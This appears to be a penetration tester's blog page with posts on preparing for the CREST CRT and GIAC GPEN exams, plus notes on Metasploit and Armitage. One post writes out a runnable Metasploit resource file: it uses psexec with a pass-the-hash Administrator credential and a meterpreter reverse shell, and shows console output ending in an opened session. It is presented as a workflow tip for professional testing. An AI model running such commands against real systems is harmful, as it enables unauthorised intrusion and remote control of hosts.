Thursday
Apr052012

CREST Registered Tester (CRT Exam)

DateThursday, 5 Apr 2012

I have been meaning to get round to is this one for a while…

It seems that a lot people come across the site looking for information on how to prep for the CREST Registered Tester (CRT) exam, and this is also what I get asked the most about though the contacts page.

Everyone is different but here is my experience without breaking the NDA (note: should anyone from CREST have objections to this post please get in touch via the contacts page and I will remove it).

I sat the exam around 8 months ago, but this post is pretty generic and could be used in any technical exam prep really.

The first thing I did was downloaded the technical syllabus, this document lists everything you are expected to know in the exam. I used the document to mind map each topic and get down an overview of what I do know about the topics. Mind mapping the syllabus helped me work out what I needed to focus on and create a study plan to work on the subjects I needed to brush up on such as analysing router and switch config files. My background as a sys admin and experience in pen testing had pretty much covered everything I needed to know.

If you have not tried mind maps for learning yet I would suggest reading about the concepts then giving it a try, I find them really useful.

In the week leading up to the exam I tried to ensure I had memorised anything that I would expect to feature in the written exam which I don’t keep in my head at all times because it is rarely needed and always just a google away. Things like details around cryptography algorithms and which vulnerabilities popular worms exploited, etc.

I am not going to go in to the details around the exam format, it changes and all the information you need is on the site, but I will put some tips that I use to help me get though exams.

Exams are stressful, but under too much stress you will begin to find it difficult to think clearly. Make sure you go in relaxed and stay that way, if you feel like you are getting stressed out just take a minute to calm yourself down and get back in to a relaxed state of mind, then carry on.

Time is an important factor here, it is not the CISSP exam where you have enough time to do the exam twice and still take an hour break in the middle. Move quickly and make sure you get it right first time round, you may not have time to check your answers at the end.

If you get stuck, move on to the next question. Do not spend time staring at the screen hoping that the solution will just pop in to your head, mark it, move on and come back to it later if you get the chance.

Lastly, enjoy the challenge, maybe I am warped but I had a good time even though I had an epic drive home ahead of me. Next time for the CCT exam I think I will just take the train.

I think learning to learn is one of the most valuable things I have ever learned.
How about you? I am interested in hearing about your approach to learning a new subject. In this line of work you are constantly learning so having good techniques for quickly learning new things is helpful.

AuthorSam Hartley | CommentPost a Comment |
tagged , ,
Friday
Mar092012

much much later...

DateFriday, 9 Mar 2012

So it has been a year since I wrote anything here and I have had a fair number of people contact me via the contact page to discuss exams, courses, pen testing and careers.

This past year has been a busy one with work and I have had very little time for R&D, training. I told my boss I wanted to do as much pen testing as possible and my wish was granted, phew.

I have promised myself I will do my best to optimise my workflow and allow time for more fun stuff which I hope to be able to share here.

I am planning to do a series of non-technical posts about pen testing then move on to some more technical stuff, however the non-tech ones may not end up being published (they have been in draft for a while now).

Until next time...

AuthorSam Hartley | CommentPost a Comment |
tagged in
Tuesday
Mar292011

GIAC Certified Penetration Tester

DateTuesday, 29 Mar 2011

Today I passed the SANS GIAC Certified Penetration Tester exam and thought I would write down a few notes to help people prepare for this exam.

The exam is 4 hours long and consists entirely of multiple choice questions, but unlike other multiple choice exams I have taken, this one does not let you come back to a question later, you can either answer the question or skip it entirely. The other thing with the exam that I have not encountered before is that it is an open book exam, meaning you can take whatever books and notes you want to take with you in to help you in answering the questions.

When I first found out it was multiple choice open book I wondered what the point was but after some research on the internet I soon found out that the exam covers many topics and tools and expects you to have a fairly in-depth knowledge of how they work and why. The practice tests helped me immensely in the preparation, I noted the subject of the question and made notes to get further information later on for anything I was not immediately familiar with. Further to this, experience in manual Penetration Testing and Systems Administration helped a whole lot too. Getting hands on with the tools covered in the exam is also important, for Metasploit there is the free “Metasploit Unleashed” course I have mentioned before and for the rest you can google, read man pages and search the Microsoft tech net archives.

I wont list all the software here on my site as there are lists out there on the internet and the practice exams will cover all of them too, it is worth taking a practice exam as early as possible in to your preparation, the report generated will give you a rating out of 5 in each area of focus, this will help you study more effectively for the actual exam.

So in a nutshell, if you are planning on sitting the GPEN exam I would suggest you:

  1. Take your first practice exam as soon as possible
  2. Note down the subject of each question as you go along (you have plenty of time)
  3. Review your report and identify the gaps in your knowledge needed to pass the exam
  4. Run through your notes and ensure you are comfortable and have extensive notes on the software in your list
  5. Sit your second practice exam using your notes / books as you will do in the real exam
  6. Study up on any remaining weak areas and improve your notes to take with you into the exam
  7. Get plenty of sleep or caffeine and go pass the real exam =]

At the time I sat the exam SANS had some technical difficulties and the exam ended over an hour early, within four SANS had resolved this and I was able to complete the exam and score a pretty reasonable 93%.

I would love to attend some of the SANS training courses like SEC660 "Advanced Penetration Testing, Exploits, and Ethical Hacking" and SEC542 "Web App Penetration Testing and Ethical Hacking" but at the moment these are out of my price range and will have to stay on my "Someday Maybe" list.

AuthorSam Hartley | Comment2 Comments |
tagged , , in
Monday
Mar212011

Metasploit resource files

DateMonday, 21 Mar 2011

Metasploit has a handy feature that allows you to load settings from a file, this allows us to create easily repeatable configurations. I like to crate a directory structure when pen testing keeping notes and tool output in plain text files and find it useful to create and store the metasploit config files along with these.

The directory structure would look something like this:

Within the 230_psexec.rc file I would enter the commands I would issue in metasploit to recreate the exploit used against a specific vulnerability (in this case, reuse of passwords across various targets).

The contents of 230_psexec.rc looks like this:

use exploit windows/smb/psexec
set PAYLOAD windows/meterpreter/reverse_tcp
setg LHOST 192.168.1.182
set RHOST 192.168.1.230
set SMBPass aad3b435b51404eeaad3b435b51404ee:49e02f1338d4b2bf743beeb97aee524d
set SMBUser Administrator
exploit

 

We can either start metasploit and run these commands right away using the command:

msfconsole -r /root/2011-03-21_acme/192.168/1/230/230_psexec.rc

or use the command ‘resource’ within msfconsole like this:

msf> resource /root/2011-03-21_acme/192.168/1/230/230_psexec.rc

 

Our output would look like this:

root@bt:~# msfconsole -r /root/2011-03-21_acme/192.168/1/230/230_psexec.rc

                __.                       .__.        .__. __.
  _____   _____/  |______    ____________ |  |   ____ |__|/  |_
 /     \_/ __ \   __\__  \  /  ___/\____ \|  |  /  _ \|  \   __\
|  Y Y  \  ___/|  |  / __ \_\___ \ |  |_> >  |_(  <_> )  ||  |
|__|_|  /\___  >__| (____  /____  >|   __/|____/\____/|__||__|
      \/     \/          \/     \/ |__|


       =[ metasploit v3.7.0-dev [core:3.7 api:1.0]
+ -- --=[ 653 exploits - 343 auxiliary
+ -- --=[ 216 payloads - 27 encoders - 8 nops
       =[ svn r11970 updated 5 days ago (2011.03.15)

resource (/root/2011-03-21_acme/192.168/1/230/230_psexec.rc)> use windows/smb/psexec
resource (/root/2011-03-21_acme/192.168/1/230/230_psexec.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/2011-03-21_acme/192.168/1/230/230_psexec.rc)> setg LHOST 192.168.1.182
LHOST => 192.168.1.182
resource (/root/2011-03-21_acme/192.168/1/230/230_psexec.rc)> set RHOST 192.168.1.230
RHOST => 192.168.1.230
resource (/root/2011-03-21_acme/192.168/1/230/230_psexec.rc)> set SMBPass aad3b435b51404eeaad3b435b51404ee:49e02f1338d4b2bf743beeb97aee524d
SMBPass => aad3b435b51404eeaad3b435b51404ee:49e02f1338d4b2bf743beeb97aee524d
resource (/root/2011-03-21_acme/192.168/1/230/230_psexec.rc)> set SMBUser Administrator
SMBUser => Administrator
resource (/root/2011-03-21_acme/192.168/1/230/230_psexec.rc)> exploit
[*] Started reverse handler on 192.168.1.182:4444
[*] Connecting to the server...
[*] Authenticating to 192.168.1.230:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Created \TwLkuthH.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.230[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.230[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (dcZDWuwa - "MluCkfMYLQRNHpqECJiJY")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Sending stage (749056 bytes) to 192.168.1.230
[*] Closing service handle...
[*] Deleting \TwLkuthH.exe...
[*] Meterpreter session 1 opened (192.168.1.182:4444 -> 192.168.1.230:49305) at Sun Mar 20 23:45:20 +0000 2011

meterpreter >
You can also now add ruby scripts in to the .rc files, I am yet to play around with these but can imagine some very useful scripts, I will write more once I have tried them out.
AuthorSam Hartley | Comment3 Comments | Reference1 Reference |
tagged , in
Tuesday
Nov302010

Armitage - fast and easy hacking

DateTuesday, 30 Nov 2010

Armitage - Fast and Easy Hacking

Metasploit is a fantastic and huge framework and things just got better with the addition of Armitage, a graphical attack management tool. Armitage will visualise targets, recommend exploits and give you direct access to the advanced features of the metasploit framework.

If you use metasploit it is well worth downloading and having a look at armitage. It is not a free version of metasploit pro, but it is an easy way to access many of the metasploit frameworks features.

The Metasploit Unleashed course from Offensive Security has been updated with a section on armitage, if you have not done the MSFU course yet you should check it out.

You can download armitage from fastandeasyhacking.com, also see the manual for more information.

Here is a video of Armitage in action.

AuthorSam Hartley | CommentPost a Comment | Reference1 Reference |
tagged , in
Page 1 2 3 4 5 ... 5 Next 5 Entries »